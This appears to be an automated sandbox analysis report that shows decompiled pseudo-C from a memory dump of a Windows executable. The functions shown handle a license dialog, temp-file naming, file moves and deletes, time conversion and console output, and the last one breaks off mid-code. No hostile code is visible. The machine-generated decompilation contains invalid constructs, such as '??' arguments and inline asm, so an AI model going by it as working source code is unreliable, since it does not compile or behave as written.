0x00000000
0x00832292
0x008322a0
0x008322a0
0x008322a3
0x008322ac
0x008322b1
0x008322b2
0x00000000
0x008322b2
0x0083275b
0x0083275b
0x0083275b
0x0083275f
0x00832765
0x0083276a
0x00000000
0x00000000
0x00000000
0x0083276a
0x00832234
0x00832194
0x00832165
0x00832772

Strings

xc%u, xrefs: 0083266C
;%u, xrefs: 0083242C
x%u, xrefs: 0083260F

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ;%u$x%u$xc%u
API String ID: 0-2277559157
Opcode ID: 8f3670d9ae78e89ed0e5bf70a556841cdc9b484d68ad80eb692f29e447aedec4
Instruction ID: efda94b79c3681cf96f2bd03ac9eaafe1024495de37c40af2c2eb81bf94b8061
Opcode Fuzzy Hash: 8f3670d9ae78e89ed0e5bf70a556841cdc9b484d68ad80eb692f29e447aedec4
Instruction Fuzzy Hash: 6FF123B16043409ADB15EF2C8895BFE7799FFD0300F084569F98ADB287CA649949C7E3

Uniqueness

Uniqueness Score: -1.00%

Function 0084A43C, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0084A43C(void* __ecx, void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
				long _t9;
				long _t10;
				WCHAR* _t11;
				void* _t25;
				signed short _t28;
				intOrPtr _t31;
				struct HWND__* _t35;
				intOrPtr _t36;
				void* _t37;
				struct HWND__* _t38;

				_t28 = _a12;
				_t36 = _a8;
				_t35 = _a4;
				if(E008312D7(__edx, _t35, _t36, _t28, _a16, L"LICENSEDLG", 0, 0) != 0) {
					L16:
					__eflags = 1;
					return 1;
				}
				_t37 = _t36 - 0x110;
				if(_t37 == 0) {
					E0084C399(__edx, __eflags, __fp0, _t35);
					_t9 =  *0x87b704;
					__eflags = _t9;
					if(_t9 != 0) {
						SendMessageW(_t35, 0x80, 1, _t9);
					}
					_t10 =  *0x885d04;
					__eflags = _t10;
					if(_t10 != 0) {
						SendDlgItemMessageW(_t35, 0x66, 0x172, 0, _t10);
					}
					_t11 =  *0x88de1c;
					__eflags = _t11;
					if(__eflags != 0) {
						SetWindowTextW(_t35, _t11);
					}
					_t38 = GetDlgItem(_t35, 0x65);
					SendMessageW(_t38, 0x435, 0, 0x10000);
					SendMessageW(_t38, 0x443, 0,  *0x86df40(0xf));
					 *0x86df3c(_t35);
					_t31 =  *0x8775e0; // 0x0
					E00849059(_t31, __eflags,  *0x870064, _t38,  *0x88de18, 0, 0);
					L00852BAE( *0x88de1c);
					L00852BAE( *0x88de18);
					goto L16;
				}
				if(_t37 != 1) {
					L5:
					return 0;
				}
				_t25 = (_t28 & 0x0000ffff) - 1;
				if(_t25 == 0) {
					_push(1);
					L7:
					EndDialog(_t35, ??);
					goto L16;
				}
				if(_t25 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x0084a43d
0x0084a443
0x0084a44a
0x0084a463
0x0084a549
0x0084a54b
0x00000000
0x0084a54b
0x0084a469
0x0084a46f
0x0084a49c
0x0084a4a1
0x0084a4ac
0x0084a4ae
0x0084a4b9
0x0084a4b9
0x0084a4bb
0x0084a4c0
0x0084a4c2
0x0084a4ce
0x0084a4ce
0x0084a4d4
0x0084a4d9
0x0084a4db
0x0084a4df
0x0084a4df
0x0084a4f4
0x0084a4fc
0x0084a50e
0x0084a511
0x0084a517
0x0084a52c
0x0084a537
0x0084a542
0x00000000
0x0084a548
0x0084a474
0x0084a483
0x00000000
0x0084a483
0x0084a479
0x0084a47c
0x0084a497
0x0084a48b
0x0084a48c
0x00000000
0x0084a48c
0x0084a481
0x0084a48a
0x00000000
0x0084a48a
0x00000000

APIs

Part of subcall function 008312D7: GetDlgItem.USER32(00000000,00003021), ref: 0083131B
Part of subcall function 008312D7: SetWindowTextW.USER32(00000000,008622E4), ref: 00831331

EndDialog.USER32(?,00000001), ref: 0084A48C
SendMessageW.USER32(?,00000080,00000001,?), ref: 0084A4B9
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0084A4CE
SetWindowTextW.USER32(?,?), ref: 0084A4DF
GetDlgItem.USER32(?,00000065), ref: 0084A4E8
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0084A4FC
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0084A50E

Strings

LICENSEDLG, xrefs: 0084A450

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: f8ac8ea6e9b8708c560eb3aab9aeda182f7fd8d94a6ed772b46c0c674ef07482
Instruction ID: a05ac2d5a6d25bab8898d0a7395d2cb9b40e6608d67de7837f70aa70d12572a6
Opcode Fuzzy Hash: f8ac8ea6e9b8708c560eb3aab9aeda182f7fd8d94a6ed772b46c0c674ef07482
Instruction Fuzzy Hash: C721A132740208BBD6159B7AED4DF7F3B6CFB4AB55F024018F601EA1A0CBD298019776

Uniqueness

Uniqueness Score: -1.00%

Function 00839300, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 137
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00839300(void* __ecx) {
				void* _t31;
				short _t32;
				long _t34;
				void* _t39;
				short _t41;
				void* _t65;
				intOrPtr _t68;
				void* _t76;
				intOrPtr _t79;
				void* _t82;
				WCHAR* _t83;
				void* _t85;
				void* _t87;

				E0084D8C4(E008613BA, __ecx);
				E0084D9C0();
				_t83 =  *(_t85 + 8);
				_t31 = _t85 - 0x4030;
				__imp__GetLongPathNameW(_t83, _t31, 0x800, _t76, _t82, _t65);
				if(_t31 == 0 || _t31 >= 0x800) {
					L20:
					_t32 = 0;
					__eflags = 0;
				} else {
					_t34 = GetShortPathNameW(_t83, _t85 - 0x5030, 0x800);
					if(_t34 == 0) {
						goto L20;
					} else {
						_t92 = _t34 - 0x800;
						if(_t34 >= 0x800) {
							goto L20;
						} else {
							 *(_t85 + 8) = E0083B9E0(_t92, _t85 - 0x4030);
							_t78 = E0083B9E0(_t92, _t85 - 0x5030);
							_t68 = 0;
							if( *_t38 == 0) {
								goto L20;
							} else {
								_t39 = E00841438( *(_t85 + 8), _t78);
								_t94 = _t39;
								if(_t39 == 0) {
									goto L20;
								} else {
									_t41 = E00841438(E0083B9E0(_t94, _t83), _t78);
									if(_t41 != 0) {
										goto L20;
									} else {
										 *(_t85 - 0x100c) = _t41;
										_t79 = 0;
										while(1) {
											_t96 = _t41;
											if(_t41 != 0) {
												break;
											}
											E0083FAE7(_t85 - 0x100c, _t83, 0x800);
											E00833F53(E0083B9E0(_t96, _t85 - 0x100c), 0x800, L"rtmp%d", _t79);
											_t87 = _t87 + 0x10;
											if(E00839F0F(_t85 - 0x100c) == 0) {
												_t41 =  *(_t85 - 0x100c);
											} else {
												_t41 = 0;
												 *(_t85 - 0x100c) = 0;
											}
											_t79 = _t79 + 0x7b;
											if(_t79 < 0x2710) {
												continue;
											} else {
												_t99 = _t41;
												if(_t41 == 0) {
													goto L20;
												} else {
													break;
												}
											}
											goto L21;
										}
										E0083FAE7(_t85 - 0x3030, _t83, 0x800);
										_push(0x800);
										E0083BA56(_t99, _t85 - 0x3030,  *(_t85 + 8));
										if(MoveFileW(_t85 - 0x3030, _t85 - 0x100c) == 0) {
											goto L20;
										} else {
											E008394D4(_t85 - 0x2030);
											 *((intOrPtr*)(_t85 - 4)) = _t68;
											if(E00839F0F(_t83) == 0) {
												_push(0x12);
												_push(_t83);
												_t68 = E008395C0(_t85 - 0x2030);
											}
											MoveFileW(_t85 - 0x100c, _t85 - 0x3030);
											if(_t68 != 0) {
												E00839572(_t85 - 0x2030);
												E008396B9(_t85 - 0x2030);
											}
											E00839506(_t85 - 0x2030);
											_t32 = 1;
										}
									}
								}
							}
						}
					}
				}
				L21:
				 *[fs:0x0] =  *((intOrPtr*)(_t85 - 0xc));
				return _t32;
			}

0x00839305
0x0083930f
0x00839316
0x00839319
0x00839328
0x00839330
0x008394bf
0x008394bf
0x008394bf
0x0083933e
0x00839347
0x0083934f
0x00000000
0x00839355
0x00839355
0x00839357
0x00000000
0x0083935d
0x00839369
0x00839378
0x0083937a
0x0083937f
0x00000000
0x00839385
0x00839389
0x0083938e
0x00839390
0x00000000
0x00839396
0x0083939e
0x008393a5
0x00000000
0x008393ab
0x008393ab
0x008393b2
0x008393b4
0x008393b4
0x008393b7
0x00000000
0x00000000
0x008393c6
0x008393e3
0x008393e8
0x008393f9
0x00839406
0x008393fb
0x008393fb
0x008393fd
0x008393fd
0x0083940d
0x00839416
0x00000000
0x00839418
0x00839418
0x0083941b
0x00000000
0x00000000
0x00000000
0x00000000
0x0083941b
0x00000000
0x00839416
0x0083942f
0x00839434
0x0083943f
0x0083945c
0x00000000
0x0083945e
0x00839464
0x0083946a
0x00839474
0x00839476
0x00839478
0x00839484
0x00839484
0x00839494
0x00839498
0x008394a0
0x008394ab
0x008394ab
0x008394b6
0x008394bb
0x008394bb
0x0083945c
0x008393a5
0x00839390
0x0083937f
0x00839357
0x0083934f
0x008394c1
0x008394c7
0x008394d1

APIs

__EH_prolog.LIBCMT ref: 00839305
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00839328
GetShortPathNameW.KERNEL32 ref: 00839347

Part of subcall function 00841438: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0083ADA2,?,?,?,0083AD51,?,-00000002,?,00000000,?), ref: 0084144E

_swprintf.LIBCMT ref: 008393E3

Part of subcall function 00833F53: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00833F66

MoveFileW.KERNEL32(?,?), ref: 00839458
MoveFileW.KERNEL32(?,?), ref: 00839494

Strings

rtmp%d, xrefs: 008393CC

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
String ID: rtmp%d
API String ID: 2111052971-3303766350
Opcode ID: f441d9666321d46a751926b360eeb544981ad2230889b8bd2cd3148f6599a38a
Instruction ID: 83889adf9a7d3c75c569b973bb85e0f863dce47b72709ece6ca0f05972245997
Opcode Fuzzy Hash: f441d9666321d46a751926b360eeb544981ad2230889b8bd2cd3148f6599a38a
Instruction Fuzzy Hash: DD418D71912258A6DF20FBA4CD45EEA777CFF84380F0440E5E689E3141EAB49B85CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00840708, Relevance: 12.1, APIs: 8, Instructions: 117
timeCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00840708(intOrPtr* __ecx, intOrPtr __edx, void* __eflags, signed int* _a4) {
				struct _SYSTEMTIME _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v56;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _t73;
				void* _t81;
				signed int _t85;
				void* _t86;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr* _t90;
				signed int* _t92;
				signed int _t94;

				_t87 = __edx;
				_t90 = __ecx;
				_v80 = E0084DF20( *__ecx,  *((intOrPtr*)(__ecx + 4)), 0x64, 0);
				_v76 = _t87;
				if(E0083AA39() >= 0x600) {
					FileTimeToSystemTime( &_v64,  &_v32);
					SystemTimeToTzSpecificLocalTime(0,  &_v32,  &_v16);
					SystemTimeToFileTime( &_v16,  &_v72);
					SystemTimeToFileTime( &_v32,  &_v56);
					asm("sbb ecx, [esp+0x24]");
					asm("sbb ecx, ebp");
					asm("adc ecx, ebp");
					_v72.dwLowDateTime = 0 - _v56.dwLowDateTime + _v72.dwLowDateTime + _v64.dwLowDateTime;
					asm("adc ecx, ebp");
					_v72.dwHighDateTime = _v72.dwHighDateTime + _v64.dwHighDateTime;
				} else {
					FileTimeToLocalFileTime( &_v64,  &_v72);
				}
				FileTimeToSystemTime( &_v72,  &_v48);
				_t92 = _a4;
				_t81 = 1;
				_t85 = _v48.wDay & 0x0000ffff;
				_t94 = _v48.wMonth & 0x0000ffff;
				_t88 = _v48.wYear & 0x0000ffff;
				_t92[3] = _v48.wHour & 0x0000ffff;
				_t92[4] = _v48.wMinute & 0x0000ffff;
				_t92[5] = _v48.wSecond & 0x0000ffff;
				_t92[7] = _v48.wDayOfWeek & 0x0000ffff;
				 *_t92 = _v48.wYear & 0x0000ffff;
				_t92[1] = _t94;
				_t92[2] = _t85;
				_t92[8] = _t85 - 1;
				if(_t94 > 1) {
					_t89 = 0x86d084;
					_t86 = 4;
					while(_t86 <= 0x30) {
						_t86 = _t86 + 4;
						_t92[8] = _t92[8] +  *_t89;
						_t89 = _t89 + 4;
						_t81 = _t81 + 1;
						if(_t81 < _t94) {
							continue;
						}
						break;
					}
					_t88 = _v48.wYear & 0x0000ffff;
				}
				if(_t94 > 2 && E00840871(_t88) != 0) {
					_t92[8] = _t92[8] + 1;
				}
				_t73 = E0084DF90( *_t90,  *((intOrPtr*)(_t90 + 4)), 0x3b9aca00, 0);
				_t92[6] = _t73;
				return _t73;
			}

0x00840708
0x0084070f
0x00840720
0x00840724
0x00840738
0x00840756
0x00840763
0x00840779
0x00840785
0x00840793
0x0084079b
0x008407a1
0x008407a7
0x008407ab
0x008407ad
0x0084073a
0x00840744
0x00840744
0x008407bb
0x008407bd
0x008407c8
0x008407c9
0x008407ce
0x008407d3
0x008407d8
0x008407e0
0x008407e8
0x008407f0
0x008407f6
0x008407f8
0x008407fb
0x008407fe
0x00840803
0x00840807
0x0084080c
0x0084080d
0x00840814
0x00840817
0x0084081a
0x0084081d
0x00840820
0x00000000
0x00000000
0x00000000
0x00840820
0x00840822
0x00840822
0x0084082a
0x00840836
0x00840836
0x00840845
0x0084084b
0x00840854

APIs

__aulldiv.LIBCMT ref: 0084071B

Part of subcall function 0083AA39: GetVersionExW.KERNEL32(?), ref: 0083AA5E

FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 00840744
FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 00840756
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00840763
SystemTimeToFileTime.KERNEL32(?,?), ref: 00840779
SystemTimeToFileTime.KERNEL32(?,?), ref: 00840785
FileTimeToSystemTime.KERNEL32(?,?), ref: 008407BB
__aullrem.LIBCMT ref: 00840845

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 9e9da42d69d668b1b0504db12a0e4c356f4f1ac121ec296840800fe5b5636b92
Instruction ID: c4c0b046ffa43b04b98801ad5cac7204ae79a6b6f1a815e3ea3739f89320424f
Opcode Fuzzy Hash: 9e9da42d69d668b1b0504db12a0e4c356f4f1ac121ec296840800fe5b5636b92
Instruction Fuzzy Hash: 3C4117B2408319AFC714DFA5C88096BB7E8FB88714F104A2EF696D2650E775E548CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0085E33D, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0085E33D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x86d668; // 0x14325215
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x890420 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x890420 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E008594CF(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x890420 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x890420 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x890420 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E008580A7( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E008580A7();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									_t48 = _t135 + 8; // 0xff76e900
									 *((intOrPtr*)(_t135 + 4)) =  *_t48 - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E0084E243(_v8 ^ _t136);
			}

0x0085e345
0x0085e34c
0x0085e34f
0x0085e357
0x0085e35b
0x0085e367
0x0085e36a
0x0085e36d
0x0085e374
0x0085e37c
0x0085e37f
0x0085e385
0x0085e38b
0x0085e390
0x0085e392
0x0085e395
0x0085e39a
0x0085e3a4
0x0085e3ab
0x0085e3ae
0x0085e3b5
0x0085e3bc
0x0085e3e8
0x0085e40e
0x0085e410
0x00000000
0x0085e3ea
0x0085e3ed
0x0085e4b4
0x0085e4c0
0x0085e4cb
0x0085e4d0
0x0085e3f3
0x0085e3fa
0x0085e3ff
0x0085e405
0x0085e40b
0x00000000
0x0085e40b
0x0085e405
0x0085e3ed
0x0085e3be
0x0085e3c2
0x0085e3c5
0x0085e3cb
0x0085e3cd
0x0085e3d0
0x0085e3d4
0x0085e411
0x0085e414
0x0085e415
0x0085e41a
0x0085e420
0x0085e426
0x0085e435
0x0085e43b
0x0085e441
0x0085e446
0x0085e462
0x0085e4d5
0x0085e4db
0x0085e464
0x0085e464
0x0085e46c
0x0085e475
0x0085e47b
0x00000000
0x0085e47d
0x0085e47f
0x0085e482
0x0085e49b
0x00000000
0x0085e49d
0x0085e4a1
0x0085e4a3
0x0085e4a6
0x00000000
0x0085e4a6
0x0085e4a1
0x0085e49b
0x0085e47b
0x0085e475
0x0085e462
0x0085e446
0x0085e420
0x00000000
0x0085e4a9
0x0085e4a9
0x0085e4dd
0x0085e4ef

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0085EAB2,00000000,00000000,00000000,00000000,00000000,0085401F), ref: 0085E37F
__fassign.LIBCMT ref: 0085E3FA
__fassign.LIBCMT ref: 0085E415
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0085E43B
WriteFile.KERNEL32(?,00000000,00000000,0085EAB2,00000000,?,?,?,?,?,?,?,?,?,0085EAB2,00000000), ref: 0085E45A
WriteFile.KERNEL32(?,00000000,00000001,0085EAB2,00000000,?,?,?,?,?,?,?,?,?,0085EAB2,00000000), ref: 0085E493

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: e3c15715c0a23f1c54cd6fb461ce0f19819ef50b319910dc8c53b1e5b2b88b9f
Instruction ID: 3dcb3b246f69eddff5d4c7e973903514e716e71eadc0e22deadd4b8f546d362c
Opcode Fuzzy Hash: e3c15715c0a23f1c54cd6fb461ce0f19819ef50b319910dc8c53b1e5b2b88b9f
Instruction Fuzzy Hash: 335116B0E006089FCB14CFA8DC81AEEBBF9FF08311F1441AAE951E7291D7309A44CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0084BBB6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E0084BBB6(intOrPtr __ebx, void* __ecx) {
				intOrPtr _t209;
				void* _t210;
				intOrPtr _t263;
				WCHAR* _t277;
				void* _t279;
				WCHAR* _t280;
				void* _t285;

				L0:
				while(1) {
					L0:
					_t263 = __ebx;
					if(__ebx != 1) {
						goto L112;
					}
					L96:
					__eax = __ebp - 0x7c84;
					__edi = 0x800;
					GetTempPathW(0x800, __ebp - 0x7c84) = __ebp - 0x7c84;
					E0083AF49(__eflags, __ebp - 0x7c84, 0x800) = 0;
					__esi = 0;
					_push(0);
					while(1) {
						L98:
						_push( *0x86d5f8);
						__ebp - 0x7c84 = E00833F53(0x8785fa, __edi, L"%s%s%u", __ebp - 0x7c84);
						__eax = E00839F0F(0x8785fa);
						__eflags = __al;
						if(__al == 0) {
							break;
						}
						L97:
						__esi =  &(__esi->i);
						__eflags = __esi;
						_push(__esi);
					}
					L99:
					__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0x8785fa);
					__eflags =  *(__ebp - 0x5c84);
					if( *(__ebp - 0x5c84) == 0) {
						while(1) {
							L164:
							_push(0x1000);
							_t197 = _t285 - 0xe; // 0xffffa36e
							_t198 = _t285 - 0xd; // 0xffffa36f
							_t199 = _t285 - 0x5c84; // 0xffff46f8
							_t200 = _t285 - 0xfc8c; // 0xfffea6f0
							_push( *((intOrPtr*)(_t285 + 0xc)));
							_t209 = E0084A1C9();
							_t263 =  *((intOrPtr*)(_t285 + 0x10));
							 *((intOrPtr*)(_t285 + 0xc)) = _t209;
							if(_t209 != 0) {
								_t210 = _t285 - 0x5c84;
								_t279 = _t285 - 0x1bc8c;
								_t277 = 6;
								goto L2;
							} else {
								break;
							}
							L4:
							while(E00841438(_t285 - 0xfc8c,  *((intOrPtr*)(0x86d618 + _t280 * 4))) != 0) {
								_t280 =  &(_t280[0]);
								if(_t280 < 0xe) {
									continue;
								} else {
									goto L164;
								}
							}
							__eflags = _t280 - 0xd;
							if(__eflags > 0) {
								continue;
							}
							L8:
							switch( *((intOrPtr*)(_t280 * 4 +  &M0084C132))) {
								case 0:
									L9:
									__eflags = _t263 - 2;
									if(_t263 != 2) {
										goto L164;
									}
									L10:
									_t282 = 0x800;
									E0084966B(_t285 - 0x7c84, 0x800);
									E0083A22C(E0083B6C2(_t285 - 0x7c84, _t285 - 0x5c84, _t285 - 0xdc8c, 0x800), _t263, _t285 - 0x8c8c, 0x800);
									 *(_t285 - 4) = _t277;
									E0083A366(_t285 - 0x8c8c, _t285 - 0xdc8c);
									E00836FEC(_t285 - 0x3c84);
									_push(_t277);
									_t271 = _t285 - 0x8c8c;
									_t224 = E0083A2B9(_t285 - 0x8c8c, _t276, _t285 - 0x3c84);
									__eflags = _t224;
									if(_t224 == 0) {
										L26:
										 *(_t285 - 4) =  *(_t285 - 4) | 0xffffffff;
										E0083A242(_t285 - 0x8c8c);
										goto L164;
									} else {
										goto L13;
										L14:
										E0083B254(_t271, __eflags, _t285 - 0x7c84, _t285 - 0x103c, _t282);
										E0083AF49(__eflags, _t285 - 0x103c, _t282);
										_t284 = E00852B93(_t285 - 0x7c84);
										__eflags = _t284 - 4;
										if(_t284 < 4) {
											L16:
											_t252 = E0083B682(_t285 - 0x5c84);
											__eflags = _t252;
											if(_t252 != 0) {
												goto L26;
											}
											L17:
											_t254 = E00852B93(_t285 - 0x3c84);
											__eflags = 0;
											 *((short*)(_t285 + _t254 * 2 - 0x3c82)) = 0;
											E0084E920(_t277, _t285 - 0x3c, _t277, 0x1e);
											_t287 = _t287 + 0x10;
											 *((intOrPtr*)(_t285 - 0x38)) = 3;
											_push(0x14);
											_pop(_t257);
											 *((short*)(_t285 - 0x2c)) = _t257;
											 *((intOrPtr*)(_t285 - 0x34)) = _t285 - 0x3c84;
											_push(_t285 - 0x3c);
											 *0x86def4();
											goto L18;
										}
										L15:
										_t262 = E00852B93(_t285 - 0x103c);
										__eflags = _t284 - _t262;
										if(_t284 > _t262) {
											goto L17;
										}
										goto L16;
										L18:
										_t229 = GetFileAttributesW(_t285 - 0x3c84);
										__eflags = _t229 - 0xffffffff;
										if(_t229 == 0xffffffff) {
											L25:
											_push(_t277);
											_t271 = _t285 - 0x8c8c;
											_t231 = E0083A2B9(_t285 - 0x8c8c, _t276, _t285 - 0x3c84);
											__eflags = _t231;
											if(_t231 != 0) {
												_t282 = 0x800;
												L13:
												SetFileAttributesW(_t285 - 0x3c84, _t277);
												__eflags =  *((char*)(_t285 - 0x2c78));
												if(__eflags == 0) {
													goto L18;
												}
												goto L14;
											}
											goto L26;
										}
										L19:
										_t233 = DeleteFileW(_t285 - 0x3c84);
										__eflags = _t233;
										if(_t233 != 0) {
											goto L25;
										} else {
											_t283 = _t277;
											_push(_t277);
											goto L22;
											L22:
											E00833F53(_t285 - 0x103c, 0x800, L"%s.%d.tmp", _t285 - 0x3c84);
											_t287 = _t287 + 0x14;
											_t238 = GetFileAttributesW(_t285 - 0x103c);
											__eflags = _t238 - 0xffffffff;
											if(_t238 != 0xffffffff) {
												_t283 = _t283 + 1;
												__eflags = _t283;
												_push(_t283);
												goto L22;
											} else {
												_t241 = MoveFileW(_t285 - 0x3c84, _t285 - 0x103c);
												__eflags = _t241;
												if(_t241 != 0) {
